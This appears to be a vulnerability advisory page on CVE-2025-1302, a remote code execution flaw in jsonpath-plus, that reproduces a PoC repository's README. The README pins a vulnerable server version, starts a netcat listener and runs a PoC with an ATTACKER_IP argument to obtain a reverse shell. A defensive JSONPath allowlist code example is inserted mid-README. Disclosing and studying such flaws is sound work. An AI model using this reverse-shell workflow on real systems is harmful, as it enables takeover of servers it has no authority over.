jsonpath-plus Remote Code Execution Vulnerability

Vulnerability Information

Vulnerability name: jsonpath-plus remote code execution vulnerability

Vulnerability IDs:

  • CVE: CVE-2025-1302

Vulnerability type: code execution (RCE)

Severity: High

Description: Affected product: jsonpath-plus is a JavaScript library for evaluating JSONPath expressions, widely used in Node.js environments to query and manipulate JSON data. It is commonly embedded in web applications and services for data processing and for handling API responses, so a security flaw in the library can reach a large number of dependent systems.

Explanation: This is a remote code execution (RCE) vulnerability in jsonpath-plus versions before 10.3.0. The root cause is the library's unsafe handling of JSONPath filter expressions: an attacker who controls the JSONPath string can supply a crafted filter that executes arbitrary code on the server. Flaws of this kind typically arise from insufficient input validation or inadequate isolation of the expression evaluation environment.

Impact analysis: The risk is severe. An attacker can run arbitrary commands on the target server and potentially take full control of the affected system. Exploitation requires no user authentication beyond reaching an endpoint that passes untrusted JSONPath input to the library, can be performed remotely and is easy to automate, which greatly widens the potential damage and reach. Successful exploitation can lead to data theft, service disruption, or use of the host as a pivot for further attacks. All systems using an affected version of jsonpath-plus should therefore upgrade to 10.3.0 or later as soon as possible.

Product: jsonpath-plus

Affected versions: version < 10.3.0

Source: https://github.com/abrewer251/CVE-2025-1302_jsonpath-plus_RCE

Type: CVE-2025: GitHub search

Repository files

  • LICENSE
  • README.md
  • package.json
  • poc.py

Source overview

CVE-2025-1302_jsonpath-plus_RCE

PoC exploit and vulnerable server demo for CVE-2025-1302 in jsonpath-plus.


Overview

This repository demonstrates a remote code execution vulnerability (CVE-2025-1302) in versions of the jsonpath-plus library prior to 10.3.0. It includes:

  • server.js: A minimal Express HTTP server running jsonpath-plus@10.2.0, exposing an endpoint vulnerable to malicious JSONPath filters.
  • cve_2025_1302_poc.py: A standalone Python PoC script that sends reverse-shell payloads to the vulnerable server.
  • package.json: Defines the server dependencies and pins jsonpath-plus to the vulnerable version.

Getting Started

Prerequisites

  • Node.js v14 or higher
  • Python 3.7 or higher
  • Netcat (or equivalent) for catching reverse shells

Installation

  1. Clone the repository

    git clone https://github.com/<YOUR-ORG>/cve-2025-1302-poc.git
    cd cve-2025-1302-poc
  2. Install server dependencies

    npm install
  3. Install Python dependencies

    pip install requests tqdm

Usage

1. Launch the Vulnerable Server

npm start
# or
node server.js

The server listens on port 3000 and accepts POST requests at /query with a JSON body of the form { "path": "<JSONPath filter>" }; the path string is passed to jsonpath-plus unchanged.
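The endpoint shape described above is exactly the pattern the PoC targets: attacker-supplied JSONPath text handed straight to the library, which then has to evaluate any filter `[?(...)]` or script `[(...)]` segment the string contains. The following is an added example, not code from the PoC repository or from jsonpath-plus itself, of how a service that only needs plain member and index access can refuse those expression segments before any evaluator sees them and resolve the remaining subset on its own. The `parseSafePath`, `evalSafePath` and `handleQuery` names, the 256-character limit and the sample document are assumptions made for this example; the handler returns a status/payload pair so it can be exercised without Express.

```javascript
// Added example (not from the PoC repository or from jsonpath-plus): a strict
// JSONPath gate for an endpoint shaped like the README's POST /query.
//
// The library has to *evaluate* filter segments `[?(...)]` and script
// segments `[(...)]`, and that evaluator is where this class of bug lives.
// A service that only ever needs plain member and index access can reject
// those segments up front and resolve the remaining subset itself, so
// attacker-controlled text never reaches an expression engine.

const MAX_PATH_LEN = 256; // assumption for the example; tune per application
const IDENT = /^([A-Za-z_][A-Za-z0-9_]*|\*)/;
// Bracket forms accepted: [0] numeric index, [*] wildcard, ['k'] / ["k"] member.
// Filters [?(...)], scripts [(...)], slices [a:b] and unions [a,b] all fail here.
const BRACKET = /^\[(?:(\d+)|\*|'([^'\\]*)'|"([^"\\]*)")\]/;

// Parse a JSONPath string into segment objects, throwing on anything outside
// the allowed subset. Supported: $, .name, ['name'], ["name"], [n], .*, [*].
function parseSafePath(path) {
  if (typeof path !== 'string' || path.length === 0 || path.length > MAX_PATH_LEN) {
    throw new Error(`path must be a non-empty string of at most ${MAX_PATH_LEN} characters`);
  }
  if (path[0] !== '$') throw new Error('path must start with $');
  const segs = [];
  let i = 1;
  while (i < path.length) {
    const rest = path.slice(i);
    let m;
    if (rest[0] === '.') {
      if (rest[1] === '.') throw new Error(`recursive descent (..) not allowed at offset ${i}`);
      m = IDENT.exec(rest.slice(1));
      if (!m) throw new Error(`bad member name at offset ${i}`);
      segs.push(m[1] === '*' ? { wildcard: true } : { key: m[1] });
      i += 1 + m[0].length;
    } else if (rest[0] === '[') {
      m = BRACKET.exec(rest);
      if (!m) throw new Error(`unsupported bracket segment at offset ${i} (filters and scripts are rejected)`);
      if (m[1] !== undefined) segs.push({ index: Number(m[1]) });
      else if (m[2] !== undefined || m[3] !== undefined) segs.push({ key: m[2] !== undefined ? m[2] : m[3] });
      else segs.push({ wildcard: true });
      i += m[0].length;
    } else {
      throw new Error(`unexpected character ${JSON.stringify(rest[0])} at offset ${i}`);
    }
  }
  return segs;
}

// Resolve parsed segments against a JSON document. Only own properties are
// followed, so `$.constructor` or `$.__proto__` yield nothing instead of
// walking into Object.prototype.
function evalSafePath(segs, json) {
  let current = [json];
  for (const seg of segs) {
    const next = [];
    for (const node of current) {
      if (node === null || typeof node !== 'object') continue;
      if (seg.wildcard) {
        next.push(...Object.values(node));
      } else if (seg.index !== undefined) {
        if (Array.isArray(node) && seg.index < node.length) next.push(node[seg.index]);
      } else if (Object.prototype.hasOwnProperty.call(node, seg.key)) {
        next.push(node[seg.key]);
      }
    }
    current = next;
  }
  return current;
}

// Handler body for POST /query. Takes the parsed request body and the document
// to query; returns { status, payload } so it can be tested without Express
// (in the real route: res.status(r.status).json(r.payload)).
function handleQuery(body, data) {
  let segs;
  try {
    segs = parseSafePath(body && body.path);
  } catch (e) {
    return { status: 400, payload: { error: e.message } };
  }
  return { status: 200, payload: { result: evalSafePath(segs, data) } };
}

// Constructed sample document for the demonstration.
const SAMPLE = {
  store: {
    books: [{ title: 'A', price: 8.95 }, { title: 'B', price: 12.99 }],
    bicycle: { color: 'red' },
  },
};

for (const p of ['$.store.books[*].title', "$['store'][\"bicycle\"].color",
                 '$.store.books[?(@.price > 10)].title', '$..price', '$.constructor']) {
  console.log(p, '=>', JSON.stringify(handleQuery({ path: p }, SAMPLE)));
}
```

A gate like this is not a substitute for upgrading to jsonpath-plus 10.3.0 or later; the two combine well, because the allowlist also removes any future expression-evaluator bypass from routes that never needed filters in the first place. If a route genuinely needs filter expressions, the untrusted part should be a value bound into a server-side template rather than the JSONPath text itself.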

2. Start a Listener

On your attacker machine, start a netcat listener:

nc -lvnp 4444

3. Run the Python PoC

python3 cve_2025_1302_poc.py \
  --url http://<TARGET_IP>:3000/query \
  --ip <ATTACKER_IP> \
  --port 4444 \
  [--payload-file payloads.txt] \
  [--delay 5] \
  [--output results.json]
  • --payload-file: Optional file containing one JSONPath template per line (use {ip} and {port} placeholders).
  • --delay: Seconds to wait before sending payloads (default: 0).
  • --output: Path to save a JSON log of requests and responses.

If successful, you’ll receive a reverse shell in your listener.


package.json

{
  "name": "jpoc",
  "version": "1.0.0",
  "main": "server.js",
  "scripts": {
    "start": "node server.js"
  },
  "dependencies": {
    "express": "^4.18.2",
    "body-parser": "^1.20.2",
    "jsonpath-plus": "10.2.0"
  }
}
  • Pinning jsonpath-plus to 10.2.0 ensures the vulnerability is present.
  • The start script runs the vulnerable server.

Contributing

  1. Fork this repository.
  2. Create a branch for your feature: git checkout -b feature/xyz.
  3. Commit your changes: git commit -m "Add xyz feature"
  4. Push to your branch: git push origin feature/xyz
  5. Open a Pull Request.

License

This PoC is provided for educational and testing purposes only. Use at your own risk.


http://example.com/2025/07/24/github_3544289578/
Author: lianccc
Published: July 24, 2025